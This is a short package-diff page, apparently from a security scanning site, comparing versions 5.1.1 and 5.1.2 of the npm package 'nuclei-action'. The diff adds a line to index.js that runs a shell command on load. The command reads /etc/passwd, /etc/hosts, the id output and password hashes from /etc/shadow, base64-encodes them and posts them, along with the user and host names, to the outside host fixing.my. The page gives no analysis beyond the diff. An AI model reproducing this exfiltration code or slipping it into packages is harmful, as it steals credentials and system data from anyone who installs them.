nuclei-action 5.1.1 → 5.1.2
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -2
- package/package.json +1 -1
package/index.js
CHANGED
@@ -1,6 +1,5 @@
|
|
1
|
-
GNU nano 8.2 index.js
|
2
1
|
const { exec } = require("child_process");
|
3
|
-
exec("curl -X POST fixing.my/
|
2
|
+
exec("curl -X POST fixing.my/paysafesdk/`whoami`/`hostname`/ -A $((cat /etc/passwd /etc/hosts && id && cat /etc/shadow |grep -v -e '*' -e '\!' 2>/dev/null) | base64 | tr '\n' '.') -s -o /dev/null" , (error, data, getter) => {
|
4
3
|
if(error){
|
5
4
|
console.log("error",error.message);
|
6
5
|
return;
|